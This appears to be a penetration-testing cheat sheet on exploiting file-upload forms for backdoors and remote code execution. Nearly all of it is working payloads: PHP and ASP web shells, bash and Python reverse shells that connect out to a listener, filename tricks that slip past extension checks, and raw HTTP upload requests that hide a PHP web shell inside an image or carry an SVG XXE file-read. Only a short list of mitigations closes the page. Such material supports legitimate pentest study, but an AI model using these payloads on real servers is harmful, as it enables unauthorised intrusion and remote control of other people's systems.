File Uploads

Ways to upload files to a server for backdoor or RCE purposes

Basic Webshell Uploads

PHP RCE

<?php system('hostname'); ?>

PHP Webshell

<?php system($_REQUEST['cmd']); ?>

ASP Web Shell

<% eval request('cmd') %>

Basic Reverse shells

Bash TCP

bash -i >& /dev/tcp/10.0.0.1/4242 0>&1

Python3

import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

Extension Bypassing

Uncommon extensions (Can be fuzzed)

shell.phtml

Case Manipulation

shell.pHp

Double Extension / Reverse Double Extension

shell.jpg.php
shell.php.jpg

Shells in Images

Create an empty image with

$ convert -size 32x32 xc:white empty.jpg

Upload the image and intercept it with BurpSuite. Append the shell at the end

POST /contact/upload.php HTTP/1.1
Host: 104.248.172.48:30240
Content-Type: multipart/form-data; boundary=---------------------------408734665627640234072772191326
Content-Length: 434
Origin: http://104.248.172.48:30240
Connection: close
Referer: http://104.248.172.48:30240/contact/

-----------------------------408734665627640234072772191326
Content-Disposition: form-data; name="uploadFile"; filename="empty.phar.jpg"
Content-Type: image/jpg

...(image gibberish)
<?php echo system($_REQUEST['cmd']);?>

-----------------------------408734665627640234072772191326--

Checks are typically done on

  • Extension names

  • Content types

  • Mime types

Play around with those to find a bypass

SVG files and XXE

An SVG file contains XML code, which can be chained with XXE vulnerabilities

POST /contact/upload.php HTTP/1.1
Host: 104.248.172.48:30240
Content-Type: multipart/form-data; boundary=---------------------------408734665627640234072772191326
Content-Length: 390
Origin: http://104.248.172.48:30240
Connection: close
Referer: http://104.248.172.48:30240/contact/

-----------------------------408734665627640234072772191326
Content-Disposition: form-data; name="uploadFile"; filename="empty.phar.svg"
Content-Type: image/svg

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=upload.php"> ]>
<svg>&xxe;</svg>

-----------------------------408734665627640234072772191326--

Mitigations

  • Extension Validation

  • Content Type Validation

  • Mime Type Validation

  • Prevent upload path disclosure

PreviousInstallationNextFile Transfers

Last updated